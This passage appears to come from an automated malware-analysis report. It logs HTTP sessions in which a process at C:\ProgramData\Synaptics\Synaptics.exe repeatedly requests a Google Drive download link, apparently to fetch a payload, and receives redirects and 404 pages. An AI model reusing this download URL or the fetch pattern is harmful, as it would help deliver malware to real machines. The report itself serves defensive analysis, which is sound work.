                                                                                                                                        2024-12-30 10:46:40 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 76 59 51 63 44 6f 71 36 46 6f 75 67 58 48 36 41 53 68 54 57 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="MvYQcDoq6FougXH6AShTWA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                        2024-12-30 10:46:40 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        70192.168.2.549873142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:40 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:40 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce--3CYfnkfBEjlRCC2dlAKzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        71192.168.2.549874142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:40 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:40 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-J2JZS2QKHiHRO-Dgvgn9GA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        72192.168.2.549875142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:40 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:41 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC59nJl1KRdaMi3b3O_E3ZsO6sRFUeM3hddZ0F46xi9LxbMV5wgJknNsLObLVMk51xAQ
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:40 GMT
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Yq12V9ypN3Q7d5XeW16JRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:41 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                        2024-12-30 10:46:41 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 30 6f 55 77 77 64 51 42 72 38 57 4e 66 5a 30 36 57 72 64 58 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="k0oUwwdQBr8WNfZ06WrdXg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                        2024-12-30 10:46:41 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        73192.168.2.549878142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:40 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:41 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC7H5jGutOktHQL-51asoFmk3Dwzs3TkdD0XYZuaA9Wm-FHmjpRaRWMym0CUKHi8Gd4R
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:41 GMT
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-zpFUKac8DfKWTZbNXvnsAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:41 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                        2024-12-30 10:46:41 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 55 58 34 65 67 45 38 4f 63 48 76 4b 2d 46 70 73 44 74 5a 45 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="3UX4egE8OcHvK-FpsDtZEg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                        2024-12-30 10:46:41 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        74192.168.2.549889142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:49 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:50 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC7eZY5umXs1nM3GPXuVab-m0HSMYihxJVcFXhlRcztjSRDK6xK6i60iBio9CoXvly7fz8dlIHE
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:49 GMT
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-e50PC8pBzN40j-9n-PgyCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:50 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                        2024-12-30 10:46:50 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 65 4b 32 65 74 6b 6c 77 67 6b 52 6d 63 34 64 6e 38 6e 6e 50 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="9eK2etklwgkRmc4dn8nnPw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                        2024-12-30 10:46:50 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        75192.168.2.549890142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:49 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:50 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC5HZPBfwWfJ54z6GnsFPZ38A-gGc6uoj3I-wV904YsrG3nJmCeWdLBgUoL6DQ6t5vlGf17lcMI
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:50 GMT
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-v_G_P6LB-MOKZBKjJ2BQ3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:50 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
